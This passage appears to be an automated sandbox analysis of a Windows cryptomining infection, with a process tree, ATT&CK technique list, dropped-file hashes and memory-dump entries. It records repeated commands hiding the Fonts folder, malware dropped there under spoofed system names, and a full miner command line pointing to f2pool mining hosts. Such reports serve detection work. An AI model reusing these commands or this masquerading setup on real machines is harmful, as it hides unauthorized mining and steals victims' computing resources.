C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1284

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1916

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1080

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:836

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1204

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:916

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1884

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:576

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1724

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:832

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1016

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1084

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1404

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1400

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:364

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1552

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1384

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1488

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1548

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1700

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1492

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:680

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1672

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1732

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1728

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1012

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2040

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1616

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1504

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1828

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:556

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:832

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:784

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1516

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1168

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:948

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1232

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1956

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1592

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1676

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1552

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1016

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1404

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1872

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1916

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1380

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1384

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1280

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1768

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1080

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1548

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:296

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1492

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1140

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1424

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1744

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1920

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:576

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1884

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1664

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1828

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2028

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1892

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1632

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1320

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:960

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1416

\??\c:\windows\Fonts\rundlls.exe
"rundlls" -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
1⤵
PID:1436

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Indicator Removal on Host

T1070

Modify Registry

T1112

Hidden Files and Directories

T1158

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tem.vbs
Filesize
215B

MD5
535a478cc80a0fbbf990eed73f8788bb

SHA1
459479dadaf00f3fa0de78f640c34dd426fd61aa

SHA256
323a4134deb72847221aa880fffefe4c191d73bc69b4d246a5e9afb57dba6c51

SHA512
3c96197cc51766f9d28fd69800865c88d015d50713a2aea6d71c097c6f4b0851535790f6adac51064b9b87c68dba268843ebb74a3da372dcc47eb39870ebdad1

Download Submit
C:\Windows\Fonts\conhost.exe
Filesize
2.9MB

MD5
1b9583c6c3eab1da961aec9e42bfbcb8

SHA1
c60f85fa6bcc463b3d38b7714916b241f2139650

SHA256
6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380

SHA512
0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4

Download Submit
C:\Windows\Fonts\rundlls.exe
Filesize
5.2MB

MD5
ed499b3a95e11ecf57e5131cd82c2a14

SHA1
7f37e85068457497f5f34e73edde4963694cfc19

SHA256
c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5

SHA512
f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\TEMP\csonhost.bat
Filesize
6KB

MD5
9da29265b1391c18f00c959c64b3fb65

SHA1
dee2f9ded1706933f452ebcd2d5ccd8818af713e

SHA256
fcf3e0486e76ea956d81dedfc64eaeb597ed0459d4356221f8f1e7f18d996824

SHA512
6d9df7132fd07c8de64501d7df5ecc421f801724e6c854952a627aead0702e452fd366e439542e24960415c58145cf99c1231ac41815f7fece394d24a39260e2

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\windows\Fonts\conhost.exe
Filesize
2.9MB

MD5
1b9583c6c3eab1da961aec9e42bfbcb8

SHA1
c60f85fa6bcc463b3d38b7714916b241f2139650

SHA256
6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380

SHA512
0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4

Download Submit
\??\c:\windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
\Windows\Fonts\rundlls.exe
Filesize
5.2MB

MD5
ed499b3a95e11ecf57e5131cd82c2a14

SHA1
7f37e85068457497f5f34e73edde4963694cfc19

SHA256
c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5

SHA512
f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
memory/108-75-0x0000000000000000-mapping.dmp

Download
memory/268-123-0x0000000000000000-mapping.dmp

Download
memory/296-137-0x0000000000000000-mapping.dmp

Download
memory/364-88-0x0000000000000000-mapping.dmp

Download
memory/544-110-0x0000000000000000-mapping.dmp

Download
memory/544-142-0x0000000000000000-mapping.dmp

Download
memory/596-112-0x0000000000000000-mapping.dmp

Download
memory/704-86-0x0000000000000000-mapping.dmp

Download
memory/784-115-0x0000000000000000-mapping.dmp

Download
memory/784-144-0x0000000000000000-mapping.dmp

Download
memory/788-62-0x0000000000000000-mapping.dmp

Download
memory/836-71-0x0000000000000000-mapping.dmp

Download
memory/844-117-0x0000000000000000-mapping.dmp

Download
memory/876-63-0x0000000000000000-mapping.dmp

Download
memory/904-120-0x0000000000000000-mapping.dmp

Download
memory/916-54-0x00000000753B1000-0x00000000753B3000-memory.dmp

Filesize
8KB

Download
memory/948-116-0x0000000000000000-mapping.dmp

Download
memory/956-76-0x0000000000000000-mapping.dmp

Download
memory/972-97-0x0000000000000000-mapping.dmp

Download
memory/976-68-0x0000000000000000-mapping.dmp

Download
memory/1040-84-0x0000000000000000-mapping.dmp

Download
memory/1096-121-0x0000000000000000-mapping.dmp

Download
memory/1168-125-0x0000000000000000-mapping.dmp

Download
memory/1204-64-0x0000000000000000-mapping.dmp

Download
memory/1228-59-0x0000000000000000-mapping.dmp

Download
memory/1236-99-0x0000000000000000-mapping.dmp

Download
memory/1332-65-0x0000000000000000-mapping.dmp

Download
memory/1352-66-0x0000000000000000-mapping.dmp

Download
memory/1356-92-0x0000000000000000-mapping.dmp

Download
memory/1416-73-0x0000000000000000-mapping.dmp

Download
memory/1472-109-0x0000000000000000-mapping.dmp

Download
memory/1560-118-0x0000000000000000-mapping.dmp

Download
memory/1560-70-0x0000000000000000-mapping.dmp

Download
memory/1568-114-0x0000000000000000-mapping.dmp

Download
memory/1584-113-0x0000000000000000-mapping.dmp

Download
memory/1616-56-0x0000000000000000-mapping.dmp

Download
memory/1660-89-0x0000000000000000-mapping.dmp

Download
memory/1668-102-0x0000000000000000-mapping.dmp

Download
memory/1680-57-0x0000000000000000-mapping.dmp

Download
memory/1720-55-0x0000000000000000-mapping.dmp

Download
memory/1732-74-0x0000000000000000-mapping.dmp

Download
memory/1768-91-0x0000000000000000-mapping.dmp

Download
memory/1872-107-0x0000000000000000-mapping.dmp

Download
memory/1888-69-0x0000000000000000-mapping.dmp

Download
memory/1912-127-0x0000000000000000-mapping.dmp

Download
memory/1916-106-0x0000000000000000-mapping.dmp

Download
memory/1916-87-0x0000000000000000-mapping.dmp

Download
memory/1924-72-0x0000000000000000-mapping.dmp

Download
memory/1936-67-0x0000000000000000-mapping.dmp

Download
memory/1952-140-0x0000000000000000-mapping.dmp

Download
memory/1952-143-0x0000000000100000-0x0000000000120000-memory.dmp

Filesize
128KB

Download
memory/1956-119-0x0000000000000000-mapping.dmp

Download
memory/1964-61-0x0000000000000000-mapping.dmp

Download
memory/1976-82-0x0000000000000000-mapping.dmp

Download
memory/2000-111-0x0000000000000000-mapping.dmp

Download
memory/2000-96-0x0000000000000000-mapping.dmp

Download
memory/2000-122-0x0000000000000000-mapping.dmp

Download
memory/2008-60-0x0000000000000000-mapping.dmp

Download
memory/2016-129-0x0000000000000000-mapping.dmp

Download
memory/2016-80-0x0000000000000000-mapping.dmp

Download
memory/2028-134-0x0000000000000000-mapping.dmp

Download
memory/2032-78-0x0000000000000000-mapping.dmp

Download
memory/2032-58-0x0000000000000000-mapping.dmp

Download
memory/2036-108-0x0000000000000000-mapping.dmp

Download
memory/2036-77-0x0000000000000000-mapping.dmp

Download
memory/2044-105-0x0000000000000000-mapping.dmp

Download